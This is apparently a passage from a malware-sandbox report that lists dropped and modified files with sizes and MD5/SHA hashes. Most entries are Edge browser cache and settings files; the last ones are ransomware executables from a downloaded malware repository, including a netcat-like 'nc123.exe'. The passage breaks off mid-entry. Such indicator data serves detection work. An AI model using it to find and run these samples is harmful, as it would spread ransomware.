C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013

Filesize
20KB

MD5
323c0dbc3678046d7cc37c8060083f9c

SHA1
a4cbb87d0a0cf4c07fd995c221e88a3a47cea38d

SHA256
e8d36c70489e878b82bc6f790d114d1a32c7b187b1043212a76f8146d9fcb005

SHA512
caa84ca897a4ec335cfaa2107dcbeb56956584a11ba4f4a4b05cb942f95c9676fa7b921f1f01a7ce1de912441216a55247d7926b35480e9ebe0e9ee173b54d03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014

Filesize
27KB

MD5
bc7321f62fec1792b4b4b06eb70b55ed

SHA1
1ec07a8dea6ba3e7cfbcfa03fd41e4fbcab88d80

SHA256
4568f3217ad7eca8b87555678b82e4fe003aa5df2c4dd7cd27f469961b3bf303

SHA512
6fb01025e6d815f26047d4f2c0eee18a992ed550b73b4d23733b2d00c70827e1407828986c2fe13f2f08a991dc45e555177199c7f226ac5aed5323bf5436fdd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015

Filesize
154KB

MD5
546ab2284d7975b991c2b0cf783d536d

SHA1
28e85560d6634d69421e44c7cd8f30a3b9961032

SHA256
67c35a5a741ee5680a056562d87052cf337aee111e613bf0364c909229f7609e

SHA512
060bc924f7c4ea8abaff64fe26a75cf74525da4ce9974edd653f0cc57b9f733f826f24cdeca56e8e126b7f3ac9d162df2a5bb755f1250792790cea6dc504db1d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016

Filesize
153KB

MD5
1b2731006f2b2597b02859e501bc2d4c

SHA1
118d27a703cef3fb083593a56bbc93e62420f30a

SHA256
59dc184cbc1a318493460d1d78999cfdaaaac9a457b5a3a02c2567dfa17314bd

SHA512
f7452f91afe2fbfcb04f80dc7b051d874224de8790bbc53858678332a6b49f7295a15989a587811e1e8fb58a38625ec3e15657d88a367fd50d5b201d7abbe90c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017

Filesize
89KB

MD5
575d2a2638451c7ddd12dbda9a27884a

SHA1
6a8e34da1b95b79eca3d952728b5f95c16c858af

SHA256
1b1467fcc9cbb18a3e0d8031870e850908fa3e4210ef94269bc0a97afc980b66

SHA512
ba376fba4102f78a51a27cf8bab05d0c39a1993b6423a830fd443cee4c74449e02587aa4bc3df92e221c8ec0c0be3ec2ab5335028edfd24ae4ebb72ed16d36f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

Filesize
84KB

MD5
1124dc0cfbc602d80c1fb660b722812b

SHA1
0e5bc36c9c505cea2873ee04a8b534d019ef51b6

SHA256
c207613fe075ec51e231ac886e7a3fae90b0e1f79a60688f64ffbd6b32adb5e8

SHA512
e8c5cfb15173202b23422c403ce19056cec3fe1c7bd8972e504b61f28de5bc7aef005932ef66ef85035b15bddff1e98e4c5b21eb1eaf5ccd31cf156a3381bdc8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000019

Filesize
20KB

MD5
014a1b0224fa841a945de432dbd13f49

SHA1
d00dd429de3ae8107d2112fdcdf82570fbcaed2d

SHA256
27cdba1a1d6be78c07d329f54a589d05627f6d1645040adf7fa529d76845e43f

SHA512
fe1a949cf7158b1a8e563c10f46f3c3440671d239abc423b37f24804ffbdc694e1b62581199e9dd8bfd180fd2f7bebd0e8e5ab1b4bff2f999fc5716a21918072

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001b

Filesize
89KB

MD5
f8cd23a48c0c8bc3d94885ba29cd945e

SHA1
f9e04c46fc3ddf7b7017057720d7a329bba29878

SHA256
d2770fcaa09d047354ee8b488fe26a2854e253c6ee000a6e351865f17b38e011

SHA512
8960c4819ea933f73b2006f88f3c9eafc2c328f7c4ee7f4ab4890dc2ff03592d94c59db6152cfb4b575742ad82019b3d7c59ea058f7be5302b26aeb1c5fc884d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001c

Filesize
28KB

MD5
9ebf52e1e4c1627a5b060601ffb483e9

SHA1
1cd01bdd300ccb77571251dde0be74a907e2ec6b

SHA256
216ea1737cacccb1a0e1a0c506bbfff5bd0c68aad94822fbf578cb81c7d72f49

SHA512
b029afb97638d132521022952ff84aebe822a53fa0fbdfaa359c410b03c63c72a23a9602cb64cf927e142dde1d3746ab7e0420c8cf7ac0c02af09eb11818a4ad

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d

Filesize
45KB

MD5
5f339ff8127ea962b8aa3a95709b6ad1

SHA1
340631518650a5f3beef366ee93ea20ceb5da39e

SHA256
b3ff14cf44c5c690b256a05bd28f7f5b193f1b03ae6a6d512dc267ebaa505260

SHA512
65e21ff5cb91fc5221bab0f952d6be06726ed9fc98d5d560b2d1e1bf2d25c3de44b1509a1962e925ab543dbb2d42eeaa7e572f9501d8e35d980e769f30b4d3bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001e

Filesize
92KB

MD5
f6174b015d5c55678e6b2eaebd6f97a4

SHA1
89f8868f81198b979b7a41800668d3a57b19176a

SHA256
5644d14bd591163bf6cc139159a3df3a52b1738b2b302e12ab509fefbb93ec4e

SHA512
b3d5547297b2d389aa92aecdd9bf504c0ff6c1e729f4d93224b971c75387cb6bca7b030ba8c10aaafb8a1a6e465f9002f6d15ba2f50dddcea43e0a919e076653

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001f

Filesize
124KB

MD5
e2b3bcf9421dc201fd07453929b519fb

SHA1
ddbfef96b723b52fbb3f42b284028eaf23de79e9

SHA256
5d7eca9b9e16a4c0d0dea7a4492486d23adbbdfda432877d1e6e565e8cab3190

SHA512
ee0eb32d381826377bc5f4d7da828fd8326f134a5c338261dab0c33322c05acd84269c0307257530e2567a978f46d946159eae0512256f63baa07057307f8f1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000020

Filesize
20KB

MD5
87e8230a9ca3f0c5ccfa56f70276e2f2

SHA1
eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7

SHA256
e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9

SHA512
37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000023

Filesize
67KB

MD5
bcfda9afc202574572f0247968812014

SHA1
80f8af2d5d2f978a3969a56256aace20e893fb3f

SHA256
7c970cd163690addf4a69faf5aea65e7f083ca549f75a66d04a73cb793a00f91

SHA512
508ca6011abb2ec4345c3b80bd89979151fee0a0de851f69b7aa06e69c89f6d8c3b6144f2f4715112c896c5b8a3e3e9cd49b05c9b507602d7f0d6b10061b17bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000027

Filesize
18KB

MD5
8eff0b8045fd1959e117f85654ae7770

SHA1
227fee13ceb7c410b5c0bb8000258b6643cb6255

SHA256
89978e658e840b927dddb5cb3a835c7d8526ece79933bd9f3096b301fe1a8571

SHA512
2e4fb65caab06f02e341e9ba4fb217d682338881daba3518a0df8df724e0496e1af613db8e2f65b42b9e82703ba58916b5f5abb68c807c78a88577030a6c2058

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002a

Filesize
215KB

MD5
d79b35ccf8e6af6714eb612714349097

SHA1
eb3ccc9ed29830df42f3fd129951cb8b791aaf98

SHA256
c8459799169b81fdab64d028a9ebb058ea2d0ad5feb33a11f6a45a54a5ccc365

SHA512
f4be1c1e192a700139d7cff5059af81c0234ed5f032796036a1a4879b032ce4eedd16a121bbf776f17bc84a0012846f467ad48b46db4008841c25b779c7d8f5a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002b

Filesize
20KB

MD5
a4f3afc86190a2d47f56664367af370e

SHA1
57613bcb2a288ef2508e847e7ba35d52f2e87de5

SHA256
52fd14eb766bc6676dd81e3bb50a4dad1891bb9a47e38c3ec620aa6c2b487c42

SHA512
bae75c59141ee60ef1fc2c745117fafea3d386b64f2f67c1022909f295228578bfc5e5e49de5a2f2efd57e75affc0a7d09fbee8fa50aadd82aff446773fc690e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00002c

Filesize
41KB

MD5
ca9e4686e278b752e1dec522d6830b1f

SHA1
1129a37b84ee4708492f51323c90804bb0dfed64

SHA256
b36086821f07e11041fc44b05d2cafe3fb756633e72b07da453c28bd4735ed26

SHA512
600e5d6e1df68423976b1dcfa99e56cb8b8f5cd008d52482fefb086546256a9822025d75f5b286996b19ee1c7cd254f476abf4de0cf8c6205d9f7d5e49b80671

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000031

Filesize
60KB

MD5
64fa5954c534d47c162e7855f8ca8f5d

SHA1
4b01f58fd07b72e3af80779144f0d3990632e62a

SHA256
5956b153c63469f778b53280ccd35624c33625f69e95cf01c25d4f1a4d1ea349

SHA512
e7def3552526a152db7b19858e7ca5795b31bae277ae541f5dc0a4f967e185b8dfd5de46c6b2b67823e0b2751794e27a8af6fcd222a89e2f0d56384dba71f9ac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000032

Filesize
22KB

MD5
bd0cba7f742945b91798983837b78b81

SHA1
c862e150068b568a2e93b1ad710adfcd869d1cf1

SHA256
a53c74843865a7d4a9d9027af6f174d9aa33a4a02a24343a7a1afa7f273f12f3

SHA512
b74147f00293e875d3dad9eaf11d44434d55d6a29f3626dec0cb686ef18df0c55f47d5e6575d24aec64c6b8d2356d7bf9878d98dfdc7c79c580f79b054a9b897

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00004c

Filesize
18KB

MD5
7d54dd3fa3c51a1609e97e814ed449a0

SHA1
860bdd97dcd771d4ce96662a85c9328f95b17639

SHA256
7a258cd27f674e03eafc4f11af7076fb327d0202ce7a0a0e95a01fb33c989247

SHA512
17791e03584e77f2a6a03a7e3951bdc3220cd4c723a1f3be5d9b8196c5746a342a85226fcd0dd60031d3c3001c6bdfee0dcc21d7921ea2912225054d7f75c896

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
5KB

MD5
01fda8786d379e3cb2f0dc55289814c8

SHA1
8278d78f6d725e92939a494ee91be41e540c799e

SHA256
720c66bb140614bf563b152a06c46cb08dab34831826c4aef6045358e99d168a

SHA512
4c1c4b84d7b5c8e43e6a736e2c7b5aa808f750aae640f1cabb9734b4da9f88126b4eefdd3cd103c3c5e00e1640bed1ef835f728cc659036ae6234d9b7733c7a8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
14KB

MD5
7c8ea6b22e953d631901f94e15c6d03a

SHA1
631d2d97d03f3138c599de8fec37a3a5838007d1

SHA256
6e96f1e494354005fccc3c9a716e2e031226e96f0f595b6e72006866b3480d41

SHA512
dd6dac0883e8830084d53fc1f737ba7ceb089f4a8f05f956aa0f06c134f3ac9306b683ae07212b588ecbf71e0880913d78684e44f1c5743e022535c0cedefcd1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
15KB

MD5
1becfc2ea183948592135412763b3e10

SHA1
8476a896e99d3cc2a14eb9c4584d2d2ff7e47a6e

SHA256
84f79b07d25b3215dc203780d2c112a3815a85c8d25d684b1e0029f7d15bbbd5

SHA512
dbc30f17adfbc7be1462ad8fe30f4089c99816ebe62dc871704b9ee41da8d102388e7d0baefb8300c1782c7954560628752cfa544b4f24cc7bdb5ce33eb959be

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
15KB

MD5
7f13e6cb98d9dd2f127cfb8a52c00a2d

SHA1
531ab4bcd0d89fc206efe2190b4f706e12e44a0c

SHA256
d172f6a54cfe5b7c6de83d5fb3e3812f63d43eb4caf781d18dbb90da386ce883

SHA512
f0d7f7edad2892e6210f92b8c1abc402e4920934852355c25a0c3ff4eaa6eade0ee6ebb3d3604e612651543cb5efecbcc09b0e9c98fa4fbf42a150366b1e7a77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
16KB

MD5
18c1f2f38e3a456b7b2f032204bbfe26

SHA1
73db6af2d2c6cb4ce9f46e838f144df2f3e65b85

SHA256
950132eac4e5e48211fa1db6226102614c85697fc4bdc0207eecb08e20da4066

SHA512
9e908cdcff08b419c58ca9c8b2ff1480e498f22c356950df2ac1ffb061a4c263c9e26ed361db3d0431490487ab481ccc4b65ae8321bb38ab5767a16f1e2afd45

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
fd28f8932a849741b27fb0697e6bd6fb

SHA1
63d851a4661422ae2671a797cb977ffd17162da9

SHA256
909fba41ccacbf600a2d3f455030a3a76dcb936bde275446581202c86cc96b92

SHA512
dbb953ddccbf67deadcb8da1704a5640ea61d07f8faeef5f2e237905fcc42dd693f121c90c296ac23f4ad467349cca88e82f17bc9ac92a8786a15898046bb13b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
9KB

MD5
32b0d705a635e7057c26d62e68ad5f95

SHA1
6d12b837e7b38468531d2b726c318fb02814ed1a

SHA256
942c4c3916bcb1bffbe5b89433af5c2baf583e8b2a0a2689948e07928804ca56

SHA512
0555fefee649f4dc7298429bc72956801feb7d21f9d2aab5bbb0f4122f02c1153f0a9f99f38e2f7724da80f3227192b84ab6fa1e8bd978f20f85c3ad74156139

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
14KB

MD5
63341e64b485c579c20c7855378234f4

SHA1
e2d864574d9799f13eb2288cf763f35810782c75

SHA256
021a47f986c1848036635f1d5838b7905bd96715a3231ef8585c44ee7d21f54f

SHA512
e3cde71db4529b05200f663c9f47aa41e888babe21452cb76697ed9d9a58d5924910409360fa1e3523422294ba096f8fcd87ea0205f99f149a73de30be98dfcf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
8ecf7bf057ca9ea4639b0b41b4ec5d69

SHA1
9ef08f381c32b9a405a96e4c42569ac667eb0b88

SHA256
1de6b5edd42c32bdc9d6a23c011614cf271ddac7bbd2e5ceaf06324d04b5ebc3

SHA512
54dd2e84364ddef523318ce4fb9140bca5f37fc604571b75f62e60a35a51a23cb50f4a67e62f22f2e8c4cb06aa5d44650772fbbbafc406c47bce8a87e736a039

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
543006c28ae58b0db14c18380c52c3e1

SHA1
41d423c01fd7729252228c1469b2d2b3bc1c1b6d

SHA256
957bbe27db55a439551a08c25ec01ab7181c7d077edced45ded304ee973666c8

SHA512
91db5166501caebb9493769a7a7e01aa574a1cc550d5ed6d9699096be63f6df869153da870a182b7ef7adfa8154c6fcef4f40f3e02d539d36e3418965d169fb4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe587059.TMP

Filesize
48B

MD5
c4e2b80ffb29b383564e440336225ede

SHA1
55002f14549b1ff7ccec90bbee3545692be2e67b

SHA256
d5ee6cda45ec020b9313ee55d1d9c01f0f12794095af6638cebeba88c3c49f47

SHA512
29c1b227271779320d3e874be902cc968fa6b1076bdbf8946136efcdce9f6bae54ad7c80a8776791e946450dc899024dbf3cfa9c2c15ef93474168695fc4cc3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
5KB

MD5
0ba1fa3af72ec46ac4e9b6dc3970b50c

SHA1
c63975a38aaf7a16e1ddc9f53a0f085c95a24230

SHA256
b74d8b9911d5a9b1454cbee554b0b588a6fea546d27d462b868b79a3779c68a2

SHA512
6658d50701e795e0ef7e8d8b1bc624f1d6205f031d9aa73c8a8d3cea40d8f30542a785121ba3657d569d01d1f480cfc37bea850c63dbbab0dfbe17b3bae7d851

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
26f6a424b1841b922eee7bb01d3f20dc

SHA1
5784951cfcf267dd777bf9bbc757360dc3abdc68

SHA256
4ff5aca843443ed9cb61834db54fb4669fcb5a606255cdf4a28b665ff9ef255e

SHA512
66b8ace1d4d7d781c349297bcbb5f04ecff535603a93b6923a5c2374a3b3a43709ed22051d6cbf8aaa35eca477dab7d3a81880c0a224809db135ed492c851335

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
5KB

MD5
d1b17566e45e272a47abdadca0e34f67

SHA1
0dfd38f8f8d2710993ad4d7b877d82af5ddba0af

SHA256
755130ac0439a51049a5ada0585bdf2ab8810bc8882c4edc0f706188338b4533

SHA512
3a4b55ed4d84ee26c3a1eb7207659063f7e83d32a895ec0fddcaec83a775c090e33dd2666396e890bcc80406ee871d8293f536740e6e1a80378770a38bf26cf1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
5KB

MD5
e9af495bbdcb6bf178db3720be1959e8

SHA1
60b1e666dd37ee597bb1cf278e24288ea28ac36f

SHA256
4f28057f82db1d5b754129c068dee534db4e602820c77cac7fdfd26009271dba

SHA512
74aab6becd2a5276c074bd7347eef31f9171fe99f5ef59529e88b97723cef32ee132f58d6f95679c11cbc436f52fb5d6cdfe0c1cf3b1dbf3d86d2e3c38ae62a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
5KB

MD5
1b22827bfad7c0e7f9b63d65eb3e1268

SHA1
4969d80c58b7daa4f20aa28b7fffbae2cf667fad

SHA256
9d96e6c3285eb076c7d54c83f7e4e015869a2dab101b3ed91f4b61aad24d860b

SHA512
5010d49aca04cf6a4c1d13afa50e1298946b70150d20f607280d3bf73f71ee83b927f9444ffbd91432683e6a8c9bd31f8077d6d7839f64d76f4e8d8f18055f23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
5KB

MD5
0e5e9eccab5495acc4850989d70986eb

SHA1
1af035f90aeda553391a4dabd4a5f0fb13d893fa

SHA256
3bb0cc72dfe0738dd0ed7829969331a601083ba85fabab92d7187cc4229bb668

SHA512
b32ea0266719ca90533cfc0870682e24cfa4b5033852a4984af95ed0b4fd651243ebc573c6b163ead411d6874014240af493cac27fa9df6f2ee93b9238c29cde

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
54984b91c7340453059abfb4ee6e1364

SHA1
2bd92180fa46e1855adec7f5ac22dccb95d838c0

SHA256
bca9555cd54534890aa19ac1788bc6d648cbc96a0e17605561565050343ba84b

SHA512
732e443886581cf54ee6d020a29400e08ab61e6f1c6e4b20bc94671efda76758b0db0b030a6805644cdd24e86e01d1f849840dab1e80af9fe7ffa91304fc9a43

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
5KB

MD5
f24b56807a137e87b0fae19a0ef7089e

SHA1
567584db834a1b09ee959067f7e9ff8205f897af

SHA256
afb2d444455d68cb8c3be1c3d7b7584ced753da6621d770a6c943367381578c0

SHA512
9488bdb8fa69bdd08c291f570b92d9da560adbfd2b28d2d7bd2afab06194402e8d0c1e60d23a2222984926eac2bdc5f5637664c60e6323e84662b19556d5cbcc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
4KB

MD5
4ecaca3f81eba610c6cbad36bc4f1fb3

SHA1
51a636809872e9f092eeaf072976dedbfdbe8ae2

SHA256
4a8f840c10216dbdffdd05a28b60ca999c7001fdc97416592072a7ff0d5ed370

SHA512
49d9fe1cd7dc348f136ae2d1bec7023e29c50dd2ea059e9827d6cc01de5e46048f73045b5e112377371ff2840a629c2650c44e9aaff36ce597d10b37913dcdce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe581cba.TMP

Filesize
1KB

MD5
096893f054fe2195cfedd16a91b5f530

SHA1
dc1e4fa26d8bfa9818d0f9b06e018bd6e62d0e9a

SHA256
8630b755d82cbb1e8e629ae60af93a11e9094c95ddc9c1d541fb2b7a22afc3e8

SHA512
95035a0b94d39c124ca99dee2592d97cd583fbd8d1503d015206c5dec18142ce62948626f93ade786e303b63a9ed55ba96a22801831b557320e0344be012b744

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
206702161f94c5cd39fadd03f4014d98

SHA1
bd8bfc144fb5326d21bd1531523d9fb50e1b600a

SHA256
1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

SHA512
0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\e2e9bf0e-76cd-47f0-a953-ae70e3235699.tmp

Filesize
16KB

MD5
5c1bf9800d830437aca59ab7afe903b3

SHA1
a80d028f1305fde6bdf022e73d904fe0b32db18d

SHA256
036beb19707fb77e7e9c23dbeab94321407625bff1b04e5b747994520ac410f3

SHA512
05d28b99da707c0c57483f0aa73847080bc52dbf03d9664edff70754cd7e33380f064b128395a97bc1683d19929d2773e8566ce4835abaf233bac9f760a8eb74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
2169e688dfd8faec7312fa57ce567c28

SHA1
b246df410aa8d612018b9507a8b355756061f7fa

SHA256
2b6c3784522e29c8f0b75468c75ad1ec1a7e7877d901d34908f1e7ac7a9fd0bc

SHA512
e850494861d336e0575bf9ac70cc435e29fbe5feb9e5d4c9f3d5cda13b2f380b9b1e2764147285f83112f31f445616fdd54ce5034e58db4524fe59d50bd640a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
924fa95d9ed7adf02af70ba4cf795cf1

SHA1
d07f29d4292a651f4d6a0676fda53bc68624333c

SHA256
73347454a92205d7ab8879ed5c604f9ca7eb8d46252a6df024c7596aaeb1109b

SHA512
57590797c387954a8fd657db34eb305fa96d9327e6e40443b7840c13afef638de6ba593085d31e01cc9ec615fbc3299bbfc2f9a054d54e17c91373f500feafc9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
a0281cd1f8640f46c2b1a231b82cbb11

SHA1
e53aa3365a74e3503fe7a15f986647d1954ffa1e

SHA256
c2a0a6013e83af1faecf80d70bd620c282bae0cc571c1000794e139f2c370b3e

SHA512
f31cc2d3a8d212666ec891feef11c2681021b8dfb70e8e66173bcd408fae994b3f33cda4c13e6abdd4e24ee9ea449fa24aa77601e475bfaee9ab2257e7a185e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
2fd1b995148a7547a0301274fc95f5ff

SHA1
8242d06a3fcdbc9324dcd1b121381af6344387a7

SHA256
4bdddad8f2e65c877ddbd457442c4f3cab65449831a4cf99175c65bea6e6889b

SHA512
909a4d19458dcc6063d1ac997f6ccf694a60cf49920def2858efa2e8e9f08c76491e0df63064d55c59664ecfd75d932c4a3019854258face3dd655a93cf848bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
74ab24a0c0c1756c923c7542eedfa856

SHA1
9999515bc1ed88ce29f83ea2fb4b55bfe01717f1

SHA256
1c0f6e8db187f1dca57fc2e2cb54b18f7e068083357b5ca2f8f357a4d8fa3f99

SHA512
174aa35905e0223ea3da2576c51fca2da6f3e584d32d8cd734d74b380f82c11f90e8e14a3f5fe8f5f60ee862de67209b5933168e36b58a09786af359aec969cc

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

Filesize
10KB

MD5
96329c73cc49cd960e2485210d01c4d2

SHA1
a496b98ad2f2bbf26687b5b7794a26aa4470148e

SHA256
4c159cab6c9ef5ff39e6141b0ccb5b8c6251a3d637520609dfbdd852fa94d466

SHA512
e98736a879cad24c693d6c5939654b2fd25bf9d348f738668624214f22d541a9b781c967201ab2d43cbac9207946824a0299d482485f4b63c48d5d2a839e5baf

Download Submit
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SettingsCache.txt

Filesize
846KB

MD5
766f5efd9efca73b6dfd0fb3d648639f

SHA1
71928a29c3affb9715d92542ef4cf3472e7931fe

SHA256
9111e9a5093f97e15510bf3d3dc36fd4a736981215f79540454ce86893993fdc

SHA512
1d4bb423d9cc9037f6974a389ff304e5b9fbd4bfd013a09d4ceeff3fd2a87ad81fe84b2ee880023984978391daf11540f353d391f35a4236b241ccced13a3434

Download Submit
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\EVER\SearchHost.exe

Filesize
1.6MB

MD5
8add121fa398ebf83e8b5db8f17b45e0

SHA1
c8107e5c5e20349a39d32f424668139a36e6cfd0

SHA256
35c4a6c1474eb870eec901cef823cc4931919a4e963c432ce9efbb30c2d8a413

SHA512
8f81c4552ff561eea9802e5319adcd6c7e5bdd1dc4c91e56fda6bdc9b7e8167b222500a0aee5cf27b0345d1c19ac9fa95ae4fd58d4c359a5232bcf86f03d2273

Download Submit
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\mssql.exe

Filesize
10.2MB

MD5
f6a3d38aa0ae08c3294d6ed26266693f

SHA1
9ced15d08ffddb01db3912d8af14fb6cc91773f2

SHA256
c522e0b5332cac67cde8fc84080db3b8f2e0fe85f178d788e38b35bbe4d464ad

SHA512
814b1130a078dcb6ec59dbfe657724e36aa3db64ed9b2f93d8559b6a50e512365c8596240174141d6977b5ddcf7f281add7886c456dc7463c97f432507e73515

Download Submit
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\mssql2.exe

Filesize
6.7MB

MD5
f7d94750703f0c1ddd1edd36f6d0371d

SHA1
cc9b95e5952e1c870f7be55d3c77020e56c34b57

SHA256
659e441cadd42399fc286b92bbc456ff2e9ecb24984c0586acf83d73c772b45d

SHA512
af0ced00dc6eeaf6fb3336d9b3abcc199fb42561b8ce24ff2e6199966ad539bc2387ba83a4838301594e50e36844796e96c30a9aa9ad5f03cf06860f3f44e0fa

Download Submit
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\nc123.exe

Filesize
125KB

MD5
597de376b1f80c06d501415dd973dcec

SHA1
629c9649ced38fd815124221b80c9d9c59a85e74

SHA256
f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

SHA512
072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

Download Submit
C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\ac\tybsidtuiyqqvxf.sys

Filesize
674KB

MD5
b2233d1efb0b7a897ea477a66cd08227

SHA1
835a198a11c9d106fc6aabe26b9b3e59f6ec68fd

SHA256
5fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da

SHA512
6ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 355934.crdownload

Filesize
49KB

MD5
46bfd4f1d581d7c0121d2b19a005d3df

SHA1
5b063298bbd1670b4d39e1baef67f854b8dcba9d

SHA256
683a09da219918258c58a7f61f7dc4161a3a7a377cf82a31b840baabfb9a4a96

SHA512
b52aa090f689765d099689700be7e18922137e7a860a00113e3f72aa6553e94a870bbb741e52de9617506a236a2a59198fb224fcd128576d76642eec9d715df5

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 37491.crdownload

Filesize
846KB

MD5
6862f65be14fd3ce88086ec79777db6e

SHA1
7f0eb7535b59a926446a400ff93f48165b58ac95

SHA256
